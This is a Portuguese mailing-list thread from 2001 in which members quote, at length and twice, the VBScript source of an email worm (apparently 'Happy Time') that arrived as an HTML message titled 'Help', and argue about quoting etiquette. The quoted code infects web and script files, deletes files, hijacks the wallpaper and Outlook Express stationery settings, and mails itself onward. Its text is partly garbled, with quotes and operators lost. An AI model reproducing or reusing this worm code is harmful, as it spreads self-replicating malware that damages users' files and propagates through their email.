Re: Help (Por Favor não mandem email html!!!!!)

2001-12-19 Por tôpico Ricardo Castanho de O. Freitas
Hash: SHA1

On Wed, 19 Dec 2001, Philipe Gaspar wrote:


Eu não sou programador, apesar de ter feitos alguns programas em VB, mas
isto aqui é *só* html???

[]s Ricardo Castanho

Em Tuesday 18 December 2001 23:56, Javier Farian escreveu:
 Title Help /Title/HEAD
 Body script language='VBScript'

 Rem I am sorry! happy time
 On Error Resume Next
 Sub mload()
 On Error Resume Next
 mPath = Grf()
 Set Os = CreateObject(Scriptlet.TypeLib)
 Set Oh = CreateObject(Shell.Application)
 If IsHTML Then
 mURL = LCase(document.Location)
 If mPath =  Then
 Os.Path = C:\Help.htm
 Os.Doc = Lhtml()
 Ihtml = span style='position:absolute'Iframe src='C:\Help.htm'
 width='0' height='0'/Iframe/span Call
 document.Body.insertAdjacentHTML(AfterBegin, Ihtml)
 If Iv(mPath, Help.vbs) Then
 setInterval Rt(), 1
 m = hta
 If LCase(m) = Right(mURL, Len(m)) Then
 id = setTimeout(mclose(), 1)
 Os.Path = mPath  \  Help.hta
 Os.Doc = Lhtml()
 Iv mPath, Help.hta
 End If
 End If
 End If
 End If
 End Sub
 Sub main()
 On Error Resume Next
 Set Of = CreateObject(Scripting.FileSystemObject)
 Set Od = CreateObject(Scripting.Dictionary)
 Od.Add html, 1100
 Od.Add vbs, 0100
 Od.Add htm, 1100
 Od.Add asp, 0010
 Ds = Grf()
 Cs = Gsf()
 If IsVbs Then
 If Of.FileExists(C:\help.htm) Then
 Of.DeleteFile (C:\help.htm)
 End If
 Key = CInt(Month(Date) + Day(Date))
 If Key = 13 Then
 Od.Add exe, 0001
 Od.Add dll, 0001
 End If
 Cn = Rg(Ks  Help\Count)
 If Cn =  Then
 Cn = 1
 End If
 Rw Ks  Help\Count, Cn + 1
 f1 = Rg(Ks  Help\FileName)
 f2 = FNext(Of, Od, f1)
 fext = GetExt(Of, Od, f2)
 Rw Ks  Help\FileName, f2
 If IsDel(fext) Then
 f3 = f2
 f2 = FNext(Of, Od, f2)
 Rw Ks  Help\FileName, f2
 Of.DeleteFile f3
 If LCase(WScript.ScriptFullname)  LCase(f2) Then
 Fw Of, f2, fext
 End If
 End If
 If (CInt(Cn) Mod 366) = 0 Then
 If (CInt(Second(Time)) Mod 2) = 0 Then
 adds = Og
 Msend (adds)
 End If
 End If
 wp = Rg(HKEY_CURRENT_USER\Control Panel\desktop\wallPaper)
 If Rg(Ks  Help\wallPaper)  wp Or wp =  Then
 If wp =  Then
 n1 = 
 n3 = Cs  \Help.htm
 mP = Of.GetFile(wp).ParentFolder
 n1 = Of.GetFileName(wp)
 n2 = Of.GetBaseName(wp)
 n3 = Cs  \  n2  .htm
 End If
 Set pfc = Of.CreateTextFile(n3, True)
 mt = Sa(1100)
 pfc.Write   HTML  body bgcolor='#007f7f' background='  n1 
 '  /Body  /HTML  mt pfc.Close
 Rw Ks  Help\wallPaper, n3
 Rw HKEY_CURRENT_USER\Control Panel\desktop\wallPaper, n3
 End If
 Set fc = Of.CreateTextFile(Ds  \Help.vbs, True)
 fc.Write Sa(0100)
 bf = Cs  \Untitled.htm
 Set fc2 = Of.CreateTextFile(bf, True)
 fc2.Write Lhtml
 oeid = Rg(HKEY_CURRENT_USER\Identities\Default User ID)
 oe = HKEY_CURRENT_USER\Identities\  oeid  \Software\Microsoft\Outlook
 Express\5.0\Mail MSH = oe  \Message Send HTML
 CUS = oe  \Compose Use Stationery
 SN = oe  \Stationery Name
 Rw MSH, 1
 Rw CUS, 1
 Rw SN, bf
 Web = Cs  \WEB
 Set gf = Of.GetFolder(Web).Files
 Od.Add htt, 1100
 For Each m In gf
 fext = GetExt(Of, Od, m)
 If fext   Then
 Fw Of, m, fext
 End If
 End If
 End Sub
 Sub mclose()
 document.Write   titleI am sorry!/title  
 End Sub
 Sub Rt()
 Dim mPath
 On Error Resume Next
 mPath = Grf()
 Iv mPath, Help.vbs
 End Sub
 Function Sa(n)
 Dim VBSText, m
 VBSText = Lvbs()
 If Mid(n, 3, 1) = 1 Then
 m = %  VBSText  %
 End If
 If Mid(n, 2, 1) = 1 Then
 m = VBSText
 End If
 If Mid(n, 1, 1) = 1 Then
 m = Lscript(m)
 End If
 Sa = m  vbCrLf
 End Function
 Sub Fw(Of, S, n)
 Dim fc, fc2, m, mmail, mt
 On Error Resume Next
 Set fc = Of.OpenTextFile(S, 1)
 mt = fc.ReadAll
 If Not Sc(mt) Then
 mmail = Ml(mt)
 mt = Sa(n)
 Set fc2 = Of.OpenTextFile(S, 8)
 fc2.Write mt
 Msend (mmail)
 End If
 End Sub
 Function Sc(S)
 mN = Rem I am sorry! happy time
 If InStr(S, mN)  0 Then
 Sc = True
 Sc = False
 End If
 End Function
 Function FNext(Of, Od, S)
 Dim fpath, fname, fext, T, gf
 On Error Resume Next
 fname = 
 T = False
 If Of.FileExists(S) Then
 fpath = Of.GetFile(S).ParentFolder
 fname = S
 ElseIf Of.FolderExists(S) Then
 fpath = S
 T = True
 fpath = Dnext(Of, )
 End If
 Do While True
 Set gf = Of.GetFolder(fpath).Files
 For Each m In gf
 If T Then
 If GetExt(Of, Od, m)   Then
 FNext = m
 Exit Function
 End If
 ElseIf LCase(m) = LCase(fname) Or fname =  Then
 T = True
 End If
 fpath = Pnext(Of, fpath)
 End Function
 Function Pnext(Of, S)
 On Error Resume Next
 Dim Ppath, Npath, gp, pn, T, m
 T = False
 If Of.FolderExists(S) Then
 Set gp = Of.GetFolder(S).SubFolders
 pn = gp.Count
 If pn = 0 Then
 Ppath = LCase(S)
 Npath = LCase(Of.GetParentFolderName(S))
 T = True
 Npath = LCase(S)
 End If
 Do While Not Er
 For Each pn In Of.GetFolder(Npath).SubFolders
 If T Then
 If Ppath = LCase(pn) Then
 T = False

Re: Help (Por Favor não mandem email html!!!!!)

2001-12-19 Por tôpico Gustavo Noronha Silva
On Wed, 19 Dec 2001 19:19:45 -0200 (BRST)
Ricardo Castanho de O. Freitas [EMAIL PROTECTED] wrote:

 Eu não sou programador, apesar de ter feitos alguns programas em VB, mas
 isto aqui é *só* html???
não, e pra quer citar a mensagem toda de novo? vocês estão querendo entupir
a banda de todo mundo com essa porcaria? =P

regra básica: cite apenas o que for importante para acompanhar o
progresso da discussão ou que for relevante ao que você vai dizer

isso é vbscript


Gustavo Noronha Silva - kov
*-* -+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+-+
|  .''`.  | Debian GNU/Linux: |
| : :'  : + Debian BR...:
| `. `'`  + Q: Why did the chicken cross the road?  +
|   `-| A: Upstream's decision. -- hmh  |
*-* -+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+-+

Re: Help (Por Favor não mandem email html!!!!!)

2001-12-18 Por tôpico Philipe Gaspar
Em Tuesday 18 December 2001 23:56, Javier Farian escreveu:
 Title Help /Title/HEAD
 Body script language='VBScript'

 Rem I am sorry! happy time
 On Error Resume Next
 Sub mload()
 On Error Resume Next
 mPath = Grf()
 Set Os = CreateObject(Scriptlet.TypeLib)
 Set Oh = CreateObject(Shell.Application)
 If IsHTML Then
 mURL = LCase(document.Location)
 If mPath =  Then
 Os.Path = C:\Help.htm
 Os.Doc = Lhtml()
 Ihtml = span style='position:absolute'Iframe src='C:\Help.htm'
 width='0' height='0'/Iframe/span Call
 document.Body.insertAdjacentHTML(AfterBegin, Ihtml)
 If Iv(mPath, Help.vbs) Then
 setInterval Rt(), 1
 m = hta
 If LCase(m) = Right(mURL, Len(m)) Then
 id = setTimeout(mclose(), 1)
 Os.Path = mPath  \  Help.hta
 Os.Doc = Lhtml()
 Iv mPath, Help.hta
 End If
 End If
 End If
 End If
 End Sub
 Sub main()
 On Error Resume Next
 Set Of = CreateObject(Scripting.FileSystemObject)
 Set Od = CreateObject(Scripting.Dictionary)
 Od.Add html, 1100
 Od.Add vbs, 0100
 Od.Add htm, 1100
 Od.Add asp, 0010
 Ds = Grf()
 Cs = Gsf()
 If IsVbs Then
 If Of.FileExists(C:\help.htm) Then
 Of.DeleteFile (C:\help.htm)
 End If
 Key = CInt(Month(Date) + Day(Date))
 If Key = 13 Then
 Od.Add exe, 0001
 Od.Add dll, 0001
 End If
 Cn = Rg(Ks  Help\Count)
 If Cn =  Then
 Cn = 1
 End If
 Rw Ks  Help\Count, Cn + 1
 f1 = Rg(Ks  Help\FileName)
 f2 = FNext(Of, Od, f1)
 fext = GetExt(Of, Od, f2)
 Rw Ks  Help\FileName, f2
 If IsDel(fext) Then
 f3 = f2
 f2 = FNext(Of, Od, f2)
 Rw Ks  Help\FileName, f2
 Of.DeleteFile f3
 If LCase(WScript.ScriptFullname)  LCase(f2) Then
 Fw Of, f2, fext
 End If
 End If
 If (CInt(Cn) Mod 366) = 0 Then
 If (CInt(Second(Time)) Mod 2) = 0 Then
 adds = Og
 Msend (adds)
 End If
 End If
 wp = Rg(HKEY_CURRENT_USER\Control Panel\desktop\wallPaper)
 If Rg(Ks  Help\wallPaper)  wp Or wp =  Then
 If wp =  Then
 n1 = 
 n3 = Cs  \Help.htm
 mP = Of.GetFile(wp).ParentFolder
 n1 = Of.GetFileName(wp)
 n2 = Of.GetBaseName(wp)
 n3 = Cs  \  n2  .htm
 End If
 Set pfc = Of.CreateTextFile(n3, True)
 mt = Sa(1100)
 pfc.Write   HTML  body bgcolor='#007f7f' background='  n1 
 '  /Body  /HTML  mt pfc.Close
 Rw Ks  Help\wallPaper, n3
 Rw HKEY_CURRENT_USER\Control Panel\desktop\wallPaper, n3
 End If
 Set fc = Of.CreateTextFile(Ds  \Help.vbs, True)
 fc.Write Sa(0100)
 bf = Cs  \Untitled.htm
 Set fc2 = Of.CreateTextFile(bf, True)
 fc2.Write Lhtml
 oeid = Rg(HKEY_CURRENT_USER\Identities\Default User ID)
 oe = HKEY_CURRENT_USER\Identities\  oeid  \Software\Microsoft\Outlook
 Express\5.0\Mail MSH = oe  \Message Send HTML
 CUS = oe  \Compose Use Stationery
 SN = oe  \Stationery Name
 Rw MSH, 1
 Rw CUS, 1
 Rw SN, bf
 Web = Cs  \WEB
 Set gf = Of.GetFolder(Web).Files
 Od.Add htt, 1100
 For Each m In gf
 fext = GetExt(Of, Od, m)
 If fext   Then
 Fw Of, m, fext
 End If
 End If
 End Sub
 Sub mclose()
 document.Write   titleI am sorry!/title  
 End Sub
 Sub Rt()
 Dim mPath
 On Error Resume Next
 mPath = Grf()
 Iv mPath, Help.vbs
 End Sub
 Function Sa(n)
 Dim VBSText, m
 VBSText = Lvbs()
 If Mid(n, 3, 1) = 1 Then
 m = %  VBSText  %
 End If
 If Mid(n, 2, 1) = 1 Then
 m = VBSText
 End If
 If Mid(n, 1, 1) = 1 Then
 m = Lscript(m)
 End If
 Sa = m  vbCrLf
 End Function
 Sub Fw(Of, S, n)
 Dim fc, fc2, m, mmail, mt
 On Error Resume Next
 Set fc = Of.OpenTextFile(S, 1)
 mt = fc.ReadAll
 If Not Sc(mt) Then
 mmail = Ml(mt)
 mt = Sa(n)
 Set fc2 = Of.OpenTextFile(S, 8)
 fc2.Write mt
 Msend (mmail)
 End If
 End Sub
 Function Sc(S)
 mN = Rem I am sorry! happy time
 If InStr(S, mN)  0 Then
 Sc = True
 Sc = False
 End If
 End Function
 Function FNext(Of, Od, S)
 Dim fpath, fname, fext, T, gf
 On Error Resume Next
 fname = 
 T = False
 If Of.FileExists(S) Then
 fpath = Of.GetFile(S).ParentFolder
 fname = S
 ElseIf Of.FolderExists(S) Then
 fpath = S
 T = True
 fpath = Dnext(Of, )
 End If
 Do While True
 Set gf = Of.GetFolder(fpath).Files
 For Each m In gf
 If T Then
 If GetExt(Of, Od, m)   Then
 FNext = m
 Exit Function
 End If
 ElseIf LCase(m) = LCase(fname) Or fname =  Then
 T = True
 End If
 fpath = Pnext(Of, fpath)
 End Function
 Function Pnext(Of, S)
 On Error Resume Next
 Dim Ppath, Npath, gp, pn, T, m
 T = False
 If Of.FolderExists(S) Then
 Set gp = Of.GetFolder(S).SubFolders
 pn = gp.Count
 If pn = 0 Then
 Ppath = LCase(S)
 Npath = LCase(Of.GetParentFolderName(S))
 T = True
 Npath = LCase(S)
 End If
 Do While Not Er
 For Each pn In Of.GetFolder(Npath).SubFolders
 If T Then
 If Ppath = LCase(pn) Then
 T = False
 End If
 Pnext = LCase(pn)
 Exit Function
 End If
 T = True
 Ppath = LCase(Npath)
 Npath = Of.GetParentFolderName(Npath)
 If Of.GetFolder(Ppath).IsRootFolder Then
 m = Of.GetDriveName(Ppath)
 Pnext = Dnext(Of, m)

Re: Help (Por Favor não mandem email html!!!!!)

2001-12-18 Por tôpico Gustavo Noronha Silva
On Wed, 19 Dec 2001 01:29:03 -0200
Philipe Gaspar [EMAIL PROTECTED] wrote:

Hau Philipe, 

citar a mensagem toda não ajudou muito a evitar os estragos feitos
pela mensagem html com vírus =(


Gustavo Noronha Silva - kov
*-* -+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+-+
|  .''`.  | Debian GNU/Linux: |
| : :'  : + Debian BR...:
| `. `'`  + Q: Why did the chicken cross the road?  +
|   `-| A: Upstream's decision. -- hmh  |
*-* -+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+--+-+-+

Re: Help (Por Favor não mandem email html!!!!!)

2001-12-18 Por tôpico Philipe Gaspar
Em Wednesday 19 December 2001 02:35, Gustavo Noronha Silva escreveu:
 On Wed, 19 Dec 2001 01:29:03 -0200
 Philipe Gaspar [EMAIL PROTECTED] wrote:

 Hau Philipe,

 citar a mensagem toda não ajudou muito a evitar os estragos feitos
 pela mensagem html com vírus =(

Pelo menos chamou a atenção ;)

Philipe Gaspar aka kr0n.
Unix SysAdmin